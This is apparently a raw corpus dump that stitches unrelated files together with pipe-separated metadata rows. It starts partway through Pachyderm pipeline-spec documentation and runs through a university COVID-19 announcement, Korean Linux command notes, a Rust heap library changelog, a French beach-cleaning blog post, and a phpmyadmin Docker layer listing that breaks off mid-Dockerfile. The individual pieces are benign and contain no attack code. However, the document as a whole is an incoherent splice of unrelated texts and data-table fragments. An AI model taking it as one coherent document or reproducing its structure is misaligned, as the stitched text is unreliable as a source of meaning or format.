1.2GB of free memory, and other large workers will be prevented from using it
(if they also set their `resource_requests`).
The `cpu` field is a double that describes the amount of CPU time (in (cpu
seconds)/(real seconds) each worker needs. Setting `"cpu": 0.5` indicates that
the worker should get 500ms of CPU time per second. Setting `"cpu": 2`
indicates that the worker should get 2000ms of CPU time per second (i.e. it's
using 2 CPUs, essentially, though worker threads might spend e.g. 500ms on four
physical CPUs instead of one second on two physical CPUs).
In both cases, the resource requests are not upper bounds. If the worker uses
more memory than it's requested, it will not (necessarily) be killed. However,
if the whole node runs out of memory, Kubernetes will start killing pods that
have been placed on it and exceeded their memory request, to reclaim memory.
To prevent your worker getting killed, you must set your `memory` request to
a sufficiently large value. However, if the total memory requested by all
workers in the system is too large, Kubernetes will be unable to schedule new
workers (because no machine will have enough unclaimed memory). `cpu` works
similarly, but for CPU time.
By default, workers are scheduled with an effective resource request of 0 (to
avoid scheduling problems that prevent users from being unable to run
pipelines). This means that if a node runs out of memory, any such worker
might be killed.
### Resource Limits (optional)
`resource_limits` describes the upper threshold of allowed resources a given
worker can consume. If a worker exceeds this value, it will be evicted.
### Datum Timeout (optional)
`datum_timeout` is a string (e.g. `1s`, `5m`, or `15h`) that determines the
maximum execution time allowed per datum. So no matter what your parallelism
or number of datums, no single datum is allowed to exceed this value.
### Job Timeout (optional)
`job_timeout` is a string (e.g. `1s`, `5m`, or `15h`) that determines the
maximum execution time allowed for a job. It differs from `datum_timeout`
in that the limit gets applied across all workers and all datums. That
means that you'll need to keep in mind the parallelism, total number of
datums, and execution time per datum when setting this value. Keep in
mind that the number of datums may change over jobs. Some new commits may
have a bunch of new files (and so new datums). Some may have fewer.
### Input (required)
`input` specifies repos that will be visible to the jobs during runtime.
Commits to these repos will automatically trigger the pipeline to create new
jobs to process them. Input is a recursive type, there are multiple different
kinds of inputs which can be combined together. The `input` object is a
container for the different input types with a field for each, only one of
these fields be set for any instantiation of the object.
```
{
"atom": atom_input,
"union": [input],
"cross": [input],
"cron": cron_input
}
```
#### Atom Input
Atom inputs are the simplest inputs, they take input from a single branch on a
single repo.
```
{
"name": string,
"repo": string,
"branch": string,
"glob": string,
"lazy" bool,
"empty_files": bool
}
```
`input.atom.name` is the name of the input. An input with name `XXX` will be
visible under the path `/pfs/XXX` when a job runs. Input names must be unique
if the inputs are crossed, but they may be duplicated between `AtomInput`s that are unioned. This is because when `AtomInput`s are unioned, you'll only ever see a datum from one input at a time. Overlapping the names of unioned inputs allows
you to write simpler code since you no longer need to consider which input directory a particular datum come from. If an input's name is not specified, it defaults to the name of the repo. Therefore, if you have two crossed inputs from the same repo, you'll be required to give at least one of them a unique name.
`input.atom.repo` is the `repo` to be used for the input.
`input.atom.branch` is the `branch` to watch for commits on, it may be left blank in
which case `"master"` will be used.
`input.atom.glob` is a glob pattern that's used to determine how the input data
is partitioned. It's explained in detail in the next section.
`input.atom.lazy` controls how the data is exposed to jobs. The default is `false`
which means the job will eagerly download the data it needs to process and it
will be exposed as normal files on disk. If lazy is set to `true`, data will be
exposed as named pipes instead and no data will be downloaded until the job
opens the pipe and reads it, if the pipe is never opened then no data will be
downloaded. Some applications won't work with pipes, for example if they make
syscalls such as `Seek` which pipes don't support. Applications that can work
with pipes should use them since they're more performant, the difference will
be especially notable if the job only reads a subset of the files that are
available to it. Note that `lazy` currently doesn't support datums that
contain more than 10000 files.
`input.atom.empty_files` controls how files are exposed to jobs. If true, it will
cause files from this atom to be presented as empty files. This is useful in shuffle
pipelines where you want to read the names of files and reorganize them using symlinks.
#### Union Input
Union inputs take the union of other inputs. For example:
```
| inputA | inputB | inputA ∪ inputB |
| ------ | ------ | --------------- |
| foo | fizz | foo |
| bar | buzz | fizz |
| | | bar |
| | | buzz |
```
Notice that union inputs, do not take a name and maintain the names of the
sub-inputs. In the above example you would see files under
`/pfs/inputA/...` or `/pfs/inputB/...`, but never both at the same time.
This can be annoying to write code for since the first thing your code
needs to do is figure out which input directory is present. As of 1.5.3
the recommended way to fix this is to give your inputs the same `Name`,
that way your code only needs to handle data being present in that
directory. This, of course, only works if your code doesn't need to be
aware of which of the underlying inputs the data comes from.
`input.union` is an array of inputs to union, note that these need not be
`atom` inputs, they can also be `union` and `cross` inputs. Although there's no
reason to take a union of unions since union is associative.
#### Cross Input
Cross inputs take the cross product of other inputs, in other words it creates
tuples of the datums in the inputs. For example:
```
| inputA | inputB | inputA ⨯ inputB |
| ------ | ------ | --------------- |
| foo | fizz | (foo, fizz) |
| bar | buzz | (foo, buzz) |
| | | (bar, fizz) |
| | | (bar, buzz) |
```
Notice that cross inputs, do not take a name and maintain the names of the sub-inputs.
In the above example you would see files under `/pfs/inputA/...` and `/pfs/inputB/...`.
`input.cross` is an array of inputs to cross, note that these need not be
`atom` inputs, they can also be `union` and `cross` inputs. Although there's no
reason to take a cross of crosses since cross products are associative.
#### Cron Input
Cron inputs allow you to trigger pipelines based on time. It's based on the
unix utility `cron`. When you create a pipeline with one or more Cron Inputs
pachd will create a repo for each of them. When a cron input triggers,
that is when the present time satisfies its spec, pachd will commit
a single file, called "time" to the repo which contains the time which
satisfied the spec. The time is formatted according to [RFC
3339](https://www.ietf.org/rfc/rfc3339.txt).
```
{
"name": string,
"spec": string,
"repo": string,
"start": time,
}
```
`input.cron.name` is the name for the input, its semantics are similar to
those of `input.atom.name`. Except that it's not optional.
`input.cron.spec` is a cron expression which specifies the schedule on
which to trigger the pipeline. To learn more about how to write schedules
see the [Wikipedia page on cron](https://en.wikipedia.org/wiki/Cron).
Pachyderm supports Nonstandard schedules such as `"@daily"`.
`input.cron.repo` is the repo which will be created for the input. It is
optional, if it's not specified then `"<pipeline-name>_<input-name>"` will
be used.
`input.cron.start` is the time to start counting from for the input. It is
optional, if it's not specified then the present time (when the pipeline
is created) will be used. Specifying a time allows you to run on matching
times from the past or, skip times from the present and only start running
on matching times in the future. Times should be formatted according to [RFC
3339](https://www.ietf.org/rfc/rfc3339.txt).
#### Git Input (alpha feature)
Git inputs allow you to pull code from a public git URL and execute that code as part of your pipeline. A pipeline with a Git Input will get triggered (i.e. will see a new input commit and will spawn a job) whenever you commit to your git repository.
**Note:** This only works on cloud deployments, not local clusters.
`input.git.URL` must be a URL of the form: `https://github.com/foo/bar.git`
`input.git.name` is the name for the input, its semantics are similar to
those of `input.atom.name`. It is optional.
`input.git.branch` is the name of the git branch to use as input
Git inputs also require some additional configuration. In order for new commits on your git repository to correspond to new commits on the Pachyderm Git Input repo, we need to setup a git webhook. At the moment, only GitHub is supported. (Though if you ask nicely, we can add support for GitLab or BitBucket).
1. Create your Pachyderm pipeline with the Git Input.
2. To get the URL of the webhook to your cluster, do `pachctl inspect-pipeline` on your pipeline. You should see a `Githook URL` field with a URL set. Note - this will only work if you've deployed to a cloud provider (e.g. AWS, GKE). If you see `pending` as the value (and you've deployed on a cloud provider), it's possible that the service is still being provisioned. You can check `kubectl get svc` to make sure you see the `githook` service running.
3. To setup the GitHub webhook, navigate to:
```
https://github.com/<your_org>/<your_repo>/settings/hooks/new
```
Or navigate to webhooks under settings. Then you'll want to copy the `Githook URL` into the 'Payload URL' field.
### Output Branch (optional)
This is the branch where the pipeline outputs new commits. By default,
it's "master".
### Egress (optional)
`egress` allows you to push the results of a Pipeline to an external data
store such as s3, Google Cloud Storage or Azure Storage. Data will be pushed
after the user code has finished running but before the job is marked as
successful.
### Standby (optional)
`standby` indicates that the pipeline should be put into "standby" when there's
no data for it to process. A pipeline in standby will have no pods running and
thus will consume no resources, it's state will be displayed as "standby".
Standby replaces `scale_down_threshold` from releases prior to 1.7.1.
### Incremental (optional)
Incremental, if set will cause the pipeline to be run "incrementally". This
means that when a datum changes it won't be reprocessed from scratch, instead
`/pfs/out` will be populated with the previous results of processing that datum
and instead of seeing the full datum under `/pfs/repo` you will see only
new/modified values. Incremental pipelines are discussed in more detail [here](../fundamentals/incrementality.html).
Incremental processing is useful for [online
algorithms](https://en.wikipedia.org/wiki/Online_algorithm), a canonical
example is summing a set of numbers since the new numbers can be added to the
old total without having to reconsider the numbers which went into that old
total. Incremental is designed to work nicely with the `--split` flag to
`put-file` because it will cause only the new chunks of the file to be
displayed to each step of the pipeline.
### Cache Size (optional)
`cache_size` controls how much cache a pipeline worker uses. In general,
your pipeline's performance will increase with the cache size, but only
up to a certain point depending on your workload.
### Enable Stats (optional)
`enable_stats` turns on stat tracking for the pipeline. This will cause the
pipeline to commit to a second branch in its output repo called `"stats"`. This
branch will have information about each datum that is processed including:
timing information, size information, logs and a `/pfs` snapshot. This
information can be accessed through the `inspect-datum` and `list-datum`
pachctl commands and through the webUI.
Note: enabling stats will use extra storage for logs and timing information.
However it will not use as much extra storage as it appears to due to the fact
that snapshots of the `/pfs` directory, which are generally the largest thing
stored, don't actually require extra storage because the data is already stored
in the input repos.
### Service (alpha feature, optional)
`service` specifies that the pipeline should be treated as a long running
service rather than a data transformation. This means that `transform.cmd` is
not expected to exit, if it does it will be restarted. Furthermore, the service
will be exposed outside the container using a kubernetes service.
`"internal_port"` should be a port that the user code binds to inside the
container, `"external_port"` is the port on which it is exposed, via the
NodePorts functionality of kubernetes services. After a service has been
created you should be able to access it at
`http://<kubernetes-host>:<external_port>`.
### Max Queue Size (optional)
`max_queue_size` specifies that maximum number of elements that a worker should
hold in its processing queue at a given time. The default value is `1` which
means workers will only hold onto the value that they're currently processing.
Increasing this value can improve pipeline performance as it allows workers to
simultaneously download, process and upload different datums at the same time.
Setting this value too high can cause problems if you have `lazy` inputs as
there's a cap of 10,000 `lazy` files per worker and multiple datums that are
running all count against this limit.
### Chunk Spec (optional)
`chunk_spec` specifies how a pipeline should chunk its datums.
`chunk_spec.number` if nonzero, specifies that each chunk should contain `number`
datums. Chunks may contain fewer if the total number of datums don't
divide evenly.
`chunk_spec.size_bytes` , if nonzero, specifies a target size for each chunk of datums.
Chunks may be larger or smaller than `size_bytes`, but will usually be
pretty close to `size_bytes` in size.
## The Input Glob Pattern
Each atom input needs to specify a [glob pattern](../fundamentals/distributed_computing.html).
Pachyderm uses the glob pattern to determine how many "datums" an input
consists of. Datums are the unit of parallelism in Pachyderm. That is,
Pachyderm attempts to process datums in parallel whenever possible.
Intuitively, you may think of the input repo as a file system, and you are
applying the glob pattern to the root of the file system. The files and
directories that match the glob pattern are considered datums.
For instance, let's say your input repo has the following structure:
```
/foo-1
/foo-2
/bar
/bar-1
/bar-2
```
Now let's consider what the following glob patterns would match respectively:
* `/`: this pattern matches `/`, the root directory itself, meaning all the data would be a single large datum.
* `/*`: this pattern matches everything under the root directory given us 3 datums:
`/foo-1.`, `/foo-2.`, and everything under the directory `/bar`.
* `/bar/*`: this pattern matches files only under the `/bar` directory: `/bar-1` and `/bar-2`
* `/foo*`: this pattern matches files under the root directory that start with the characters `foo`
* `/*/*`: this pattern matches everything that's two levels deep relative
to the root: `/bar/bar-1` and `/bar/bar-2`
The datums are defined as whichever files or directories match by the glob pattern. For instance, if we used
`/*`, then the job will process three datums (potentially in parallel):
`/foo-1`, `/foo-2`, and `/bar`. Both the `bar-1` and `bar-2` files within the directory `bar` would be grouped together and always processed by the same worker.
## Multiple Inputs
It's important to note that if a pipeline takes multiple atom inputs (via cross
or union) then the pipeline will not get triggered until all of the atom inputs
have at least one commit on the branch.
## PPS Mounts and File Access
### Mount Paths
The root mount point is at `/pfs`, which contains:
- `/pfs/input_name` which is where you would find the datum.
- Each input will be found here by its name, which defaults to the repo
name if not specified.
- `/pfs/out` which is where you write any output.
### Output Formats
PFS supports data to be delimited by line, JSON, or binary blobs.
| 39.48 | 453 | 0.721337 | eng_Latn | 0.999199 |
977c658aee213adbb82923de54c67b724bd3043a | 2,293 | md | Markdown | data/article/institute/us/us-rpi/2020-04-10-14_00_24.md | drumlab/covid19-datahub | 97bc3853c28860673f80292fb1ac7869430d11f1 | [
"MIT"
] | 5 | 2020-04-06T13:22:17.000Z | 2020-06-24T03:22:12.000Z | data/article/institute/us/us-rpi/2020-04-10-14_00_24.md | drumlab/covid19-datahub | 97bc3853c28860673f80292fb1ac7869430d11f1 | [
"MIT"
] | 26 | 2020-03-30T04:42:14.000Z | 2020-04-29T05:33:02.000Z | data/article/institute/us/us-rpi/2020-04-10-14_00_24.md | drumlab/covid19-datahub | 97bc3853c28860673f80292fb1ac7869430d11f1 | [
"MIT"
] | 20 | 2020-03-29T02:09:44.000Z | 2020-04-11T03:36:52.000Z | ---
title: COVID-19 (Coronavirus)
subtitle:
date: 2020-04-08
link: >-
https://covid19.rpi.edu/announcements/summer-semester
countryCode: us
status: published
instituteSlug: us-rpi
---

Even as we approach the final weeks of instruction for the spring semester, planning is in full swing for the summer semester. With an emphasis on protecting the health and safety of our community, and reducing the risk from COVID-19 disease, President Jackson announced that instruction for the summer semester, including Arch classes, will be delivered remotely.
To support students throughout the Arch summer semester, as well as any students taking online courses with us, Rensselaer student and academic services will be fully operational including the Advising and Learning Assistance Center (ALAC), Student Success, and Class Deans.
The Center for Career and Professional Development (CCPD) will continue to provide comprehensive and individualized services to assist all students with their searches for away semester opportunities, co-ops, internships, and full-time jobs. Students enrolled in the Arch Preparation Course should complete all assignments; the course outcomes are critical for success in securing semester away opportunities. To connect with the Career Counselor for a specific school, students may schedule an appointment on Joblink. Students may also utilize the “Chat with an Advisor” feature on the JobLink main page for on-demand assistance between 8 a.m. and 5 p.m. (EST), Monday through Friday, or email the CCPD.
In addition to information on the summer semester, we also want to provide additional information on a question that many of you have raised about adjustments to room and board charges for the spring 2020 semester. The Institute will be providing pro-rata room and board credits, net of Rensselaer financial aid. Credits will be posted in the coming weeks. Additional information on this topic will be available on the COVID-19 website.
We look forward to continuing to support you throughout the rest of the spring term and beyond. Please be well and continue to take the recommended steps to keep yourselves and our community safe and healthy. | 50.955556 | 704 | 0.802006 | eng_Latn | 0.998777 |
977cb31931fe04f4db260a2b44a7dd2979e6acd3 | 3,127 | md | Markdown | _posts/2020-07-07-Linux03.md | hyuntaekhong/hyuntaekhong.github.io | 5bb9c04e3e0c2bac6e7f0eff095e3fc7199b4cc6 | [
"MIT"
] | 1 | 2020-07-07T00:00:42.000Z | 2020-07-07T00:00:42.000Z | _posts/2020-07-07-Linux03.md | hyuntaekhong/hyuntaekhong.github.io | 5bb9c04e3e0c2bac6e7f0eff095e3fc7199b4cc6 | [
"MIT"
] | null | null | null | _posts/2020-07-07-Linux03.md | hyuntaekhong/hyuntaekhong.github.io | 5bb9c04e3e0c2bac6e7f0eff095e3fc7199b4cc6 | [
"MIT"
] | 2 | 2020-03-30T01:15:04.000Z | 2021-12-07T07:47:51.000Z | ---
title: "[Linux 03] 리눅스 명령어 기초(2) - 파일과 디렉토리"
date: 2020-07-07
categories:
- blog
tags:
- Linux
comments: true
excerpt: 리눅스 명령어 기초 (2)
last_modified_at: 2020-07-07
toc: true
---
## 파일과 디렉토리
### 1. 파일 기본 사항
#### (1) 파일과 디렉토리 다루기
#### 1) 디렉토리, 절대/상대 경로
a) 절대경로
- 루트 디렉토리부터 현재 파일이 위치한 디렉토리의 경로를 전체경로로 표시
- 예) /home/user/test/hello.txt
b) 상대경로
- 명령어 쉘 상태에서 현재 위치로부터 파일이 있는 디렉토리를 표기한 경로
- 현재 위치를 점으로 나타내서 표기
- 현재 위치는 점 한개 '.' , 상위 디렉토리는 점 두개 '..'로 표시
#### 2) 파일 탐색
- pwd : 현재의 작업 디렉토리가 어디인지 출력
- cd : 현재의 작업 디렉토리를 바꿈
- ls : 디렉토리에 파일 목록을 보여줌
#### 3) 파일 내용 보기
- cat filename : filename 이라는 파일의 내용을 한 번에 출력
- more : 파이프(\|)를 같이 사용하여 화면 단위로 출력
- page filename : filename의 파일을 화면 단위로 출력
- head
- 파일의 내용을 맨 앞을 기준으로 보여줌
- head -n filename : filename의 파일을 처음 n줄을 표시
- tail
- 파일의 내용을 맨 뒤를 기준으로 보여줌
- tail -n filename : filename의 파일을 뒤부터 n줄로 표시
- tail -f filename : 계속 작성중인 파일의 마지막을 계속적으로 표시
#### 4) 파일 다루기
- mv
- 파일을 이동하는 명령
- mv oldfilename newfilename : oldfile을 newfile로 파일명을 변경
- mv filename dirName : 파일을 해당 디렉토리로 이동
- mv oldDirName newDirName : oldDir의 모든 파일을 newDir이라는 디렉토리를 만든 후 이동
- cp
- 파일을 복사하는 명령
- cp oldfile newfile : oldfile 내용을 newfile로 복사
- cp filename dirName : 파일을 해당 디렉토리로 보냄
- cp oldDirName newDirName : oldDir의 모든 파일을 newDir이라는 디렉토리를 만든 후 복사
- cp -R oldDir newDir : -R 옵션은 하위 디렉토리까지 모두 복사
- rm
- 파일을 지우는 명령
- rm filename : 파일을 지움
#### 5) 명령어 히스토리
- r 또는 ! : 기존에 사용했던 명령어 찾기
- 명령어 히스토리 저장 파일
- 지금까지 사용한 명령어는 해당 사용자의 기본 디렉토리 내에 '.bash_history'(리눅스 bash)라는 파일 안에 저장된다.
- 어떤 사용자가 어떤 명령어로 시스템에 접근했는지 근거 파일로 사용됨
- 기업용 시스템에서는 해당 파일을 실시간 중앙통제장치로 전송하여 보관함으로써 불순한 의도의 접근을 감시하는 용도로 사용
#### 6) 디렉토리 관리
- mkdir : 새로운 디렉토리 생성
- rmdir : 해당 디렉토리를 삭제
#### 7) 파일의 문자수 세기
- wc
- 파일 내부의 글자 수 및 줄 수를 보여줌
- 출력되는 순서는 파일의 줄 수[newline], 단어 수[word], 글자 수[byte]
### 2. 파일 다루기
#### (1) 파일 필터
##### 1) 파이프(|)와 grep 명령
- grep
- 지정된 표현형식이 전체에 있는지 찾아서 프린트 함.
- 예) grep "gh" abc.txt , cd abc.txt\|grep gh
- grep 주요옵션
- w : 전체 단어가 일치되는 경우 출력
- n : 라인 넘버 출력
- v : 단어가 일치하지 않는 경우 출력
- l : 해당되는 파일명을 출력
##### 2) 리다이렉션(Redirection)
- 명령어의 결과를 다른 명령어의 입력으로 사용하는 경우나, 명령어의 결과를 파일에 기록하는 경우에 사용
- 파이프(\|)
- 명령1 \| 명령2 : 어떤 명령의 결과를 받아 다른 명령을 실행
- 리다이렉션(>, >>)
- 명령 > filename : 어떤 명령의 결과를 지정된 명칭의 파일을 새로 생성하여 기록
- 명령 > filename : 어떤 명령의 결과를 지정된 명칭의 파일 뒤로 계속 붙여서 기록
- 명령 < filename : 어떤 명령의 입력으로 지정된 명칭의 파일을 사용함
#### (2) 파일 비교, 정렬, 탐색
##### 1) 파일 비교
- cmp
- cmp file1 file2 : 두 개의 파일을 비교하는 명령
- diff
- diff file1 file2 : 두 개의 파일의 차이를 보여주는 명령
##### 2) 파일 정렬
- sort
- 파일 내용을 정렬 조건에 따라 정렬
- sort abc.txt : 파일을 오름차순으로 정렬
- sort -r abc.txt : 파일을 내림차순으로 정렬
- sort -k2 abc.txt : 2번째 필드를 기준으로 정렬
##### 3) 파일 검색
- find
- 원하는 조건의 파일 위치를 찾아줌
- find의 주요조건
- -name : 파일 이름이나 패턴 검색
- -type : 파일의 파일 유형이 일치하는 파일 검색
- -user : 파일의 사용자가 일치하는 파일 검색
- -group : 파일의 그룹이 일치하는 파일 검색
#### (3) 파일 보관. 압축
- tar
- 파일을 보관하거나 푸는 명령어
- tar -cvf tarFilename fileList : 파일을 묶을 때
- tar -txru tarFilename fileList : 묶은 파일을 풀 때
- gzip/gunzip
- 파일을 압축하고 푸는 명령어
- gzip abc : abc파일을 압축한 abc.gz 파일 생성
- gunzip abc.gz : abc.gz 파일의 압축이 풀어져 abc 파일로 복원 | 20.174194 | 76 | 0.613048 | kor_Hang | 1.00001 |
977d2f84b73e0c5b3a44563e2f1ccbb780b2b290 | 2,056 | md | Markdown | CHANGELOG.md | yonran/min-max-heap-rs | 51464629dc75a92eb4e6ba746adc3cbafd1a7fd4 | [
"Apache-2.0",
"MIT"
] | null | null | null | CHANGELOG.md | yonran/min-max-heap-rs | 51464629dc75a92eb4e6ba746adc3cbafd1a7fd4 | [
"Apache-2.0",
"MIT"
] | null | null | null | CHANGELOG.md | yonran/min-max-heap-rs | 51464629dc75a92eb4e6ba746adc3cbafd1a7fd4 | [
"Apache-2.0",
"MIT"
] | null | null | null | # Changelog
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog] and this project adheres to
[Semantic Versioning].
[Keep a Changelog]: http://keepachangelog.com/en/1.0.0/
[Semantic Versioning]: http://semver.org/spec/v2.0.0.html
## [Unreleased]
### Fixed
- Documented time complexity of `push` to be worst-case linear and amortized
logarithmic.
## [1.2.0] - 2018-06-02
### Added
- Two new iterator types, `DrainAsc` and `DrainDesc`, and two new methods
for creating them, `MinMaxHeap::drain_asc` and `MinMaxHeap::drain_desc`.
These iterators drain the heap in ascending (min-first) or descending
(max-first) order, respectively.
- Implementations of `Iterator::size_hint` for `Drain`, `IntoIter`, and
`Iter` iterator types.
## [1.1.1] - 2018-05-30
### Added
- `#[doc(html_base_url = ...)]` annotation in crate root.
## [1.1.0] - 2018-05-12
### Added
- Optional serde support. Enable `"serde"` Cargo feature to get impls
of `Serializable` and `Deserializable` for `MinMaxHeap`.
- Documented oldest supported rustc version: 1.20.
## [1.0.4] - 2018-05-04
### Changed
- Uses `ManuallyDrop` instead of `Option` in internal `Hole`
implementation. (Thanks to Nikita Popov.)
## [1.0.3] - 2018-05-03
### Added
- Some simple benchmarks.
### Changed
- Internal `is_min_level` function uses `leading_zeros` instead of an
*O*(log *n*)–time loop.
## [1.0.2] - 2018-04-01
### Fixed
- Documentation URL.
## [1.0.1] - 2018-03-31
### Removed
- Dependency on Clippy. Use `cargo +nightly clippy` instead.
## [1.0.0] - 2018-03-31
### Added
- Automatic code coverage checking on codecov.io.
## [0.2.1] - 2016-06-13
### Fixed
- Bad crate metadata.
## [0.2.0] - 2016-06-13
### Added
- `MinMaxHeap::into_vec_asc` and `MinMaxHeap::into_vec_desc` methods.
- Impl of `From<Vec<T>>` for `MinMaxHeap<T>`.
## [0.1.2] - 2016-06-13
### Removed
- Clippy warnings.
## [0.1.1] - 2016-06-12
### Added
- Mentioned `crates.io` in docs.
## [0.1.0] - 2016-06-12
Initial release
| 21.642105 | 77 | 0.671693 | eng_Latn | 0.838142 |
977d364e6362592d59d0c0634a56459f599601c9 | 3,027 | md | Markdown | content/posts/juste-deux-minutes/index.md | ys/wanders | 6030282a5ed0e80cd1021b716fa5cfaffe5d2225 | [
"MIT"
] | null | null | null | content/posts/juste-deux-minutes/index.md | ys/wanders | 6030282a5ed0e80cd1021b716fa5cfaffe5d2225 | [
"MIT"
] | 62 | 2018-09-22T06:53:25.000Z | 2020-10-08T07:40:17.000Z | content/posts/juste-deux-minutes/index.md | ys/wanders | 6030282a5ed0e80cd1021b716fa5cfaffe5d2225 | [
"MIT"
] | 2 | 2018-04-09T10:52:03.000Z | 2019-05-26T12:05:59.000Z | ---
title: "Juste deux minutes"
subtitle: "Des plages, des habitudes et des sourires"
date: 2019-05-04T15:38:06+02:00
draft: false
description: "Ce sont les petits gestes qui comptent pour aider l'humain. Deux minutes suffisent. Nettoyons les plages"
tags:
[
"environement",
"plage",
"nettoyage",
"ecologie",
"leave no trace",
"volontariat",
"petits gestes",
]
categories:
- journal
- activism
slug: "juste-deux-minutes"
emoji: "🌍"
resources:
- src: "*.webp"
- src: "cover.webp"
name: "cover"
summary: "Ce sont les petits gestes qui comptent pour aider l'humain à avancer. Il en faut des gros, c'est sur. Mais il nous faut aussi des petits gestes. Comme disait la compagnie Créole, c'est bon pour le moral. Et vous savez ce qui aide le plus à avancer? Positiver. Les émotions sont contagieuses et je préfère en partager des positives que des négatives lorsqu'on en vient à notre planète."
---
Ce sont les petits gestes qui comptent pour aider l'humain à avancer. Il en faut des gros, c'est sur. Mais il nous faut aussi des petits gestes. Comme disait la compagnie Créole, c'est bon pour le moral. Et vous savez ce qui aide le plus à avancer? Positiver. Les émotions sont contagieuses et je préfère en partager des positives que des négatives lorsqu'on en vient à notre planète.
Alors, on apprend les petits gestes à Tom. Il a besoin de comprendre que la terre va mal, et que c'est de notre faute. Il a aussi besoin de savoir, déjà à cinq ans, qu'il peut avoir un impact positif sur notre belle planète.
Un des petits gestes qu'on a pris comme habitude, c'est de nettoyer les plages. Il suffit de [deux minutes](https://beachclean.net) pour aider nos plages. Plus c'est mieux mais déjà deux minutes suffisent a la rendre plus belle. On a toujours un distributeur de sacs dans notre sac à dos. Un truc en plastique offert par [AS Adventure](https://www.asadventure.com/) qui nous permet de faire des petits sacs poubelles. Du plastique pour enlever le plastique, un peu ironique mais au final, ça marche pas mal. Et dès que l'on voit des déchets, on les ramasse, les stocke et les jette une fois la balade finie. Il y a bien sur aussi les [bacs à marée](https://bacamaree.fr) qui poussent un peu partout en Bretagne et ailleurs. N'hésitez pas à y ramener les bouts de cordes et autres detritus que vous trouvez. Gardez les vôtres, dans vos sacs, et jetez les dans une poubelle une fois la sortie finie. Cela ne demande pas de gros efforts. Si on prenaient tous ces deux minutes et si on réfléchissait avant de jeter quelque chose sur la plage, on y serait encore mieux.
Si vous voulez aussi aider nos océans et plages, n'hésitez pas à aller faire un tour sur le site de [Surfrider](https://www.surfrider.eu) ou [Surfers Against Sewage](https://www.sas.org.uk/). N'hésitez pas à faire des dons ou à donner de votre personne. Votre temps est votre don le plus précieux. La Terre vous dit merci. Et Tom aussi.
{{< photo src="1.webp" alt="Tom n'aime pas les dechets" class="vertical" >}}
| 79.657895 | 1,064 | 0.75223 | fra_Latn | 0.990198 |
977d90e3e010647c5d35bfbfc46932f2805767c9 | 118,744 | md | Markdown | repos/phpmyadmin/remote/fpm.md | kamarules74/repo-info | 968c5f6a064fe9e0e24b4e3265c98aef204a41d5 | [
"Apache-2.0"
] | null | null | null | repos/phpmyadmin/remote/fpm.md | kamarules74/repo-info | 968c5f6a064fe9e0e24b4e3265c98aef204a41d5 | [
"Apache-2.0"
] | null | null | null | repos/phpmyadmin/remote/fpm.md | kamarules74/repo-info | 968c5f6a064fe9e0e24b4e3265c98aef204a41d5 | [
"Apache-2.0"
] | null | null | null | ## `phpmyadmin:fpm`
```console
$ docker pull phpmyadmin@sha256:9a028739fb4cb6b63f7e42c485ee34243e679f8bf2884da09ade1346d326bcc6
```
- Manifest MIME: `application/vnd.docker.distribution.manifest.list.v2+json`
- Platforms:
- linux; amd64
- linux; arm variant v5
- linux; arm variant v7
- linux; arm64 variant v8
- linux; 386
- linux; mips64le
- linux; ppc64le
- linux; s390x
### `phpmyadmin:fpm` - linux; amd64
```console
$ docker pull phpmyadmin@sha256:e72d40cf549f0df6e0879594970a24c09785c2043c50b9f10d0ae86a4134149a
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **160.0 MB (160004977 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:3accfc160a42d0f7f86c7979613807111ef72caa358bcd73bcfe0874571fc551`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:49:29 GMT
ADD file:b797b4d60ad7954e98ad71574c4fc90ad3da9a5c250112373e92e2af3056e581 in /
# Tue, 30 Mar 2021 21:49:30 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 09:51:10 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 09:51:10 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 09:51:48 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 09:51:49 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 09:51:51 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 10:04:18 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 10:04:18 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 10:04:18 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 10:04:18 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 10:24:38 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 10:24:39 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 10:24:39 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 10:24:39 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 10:24:49 GMT
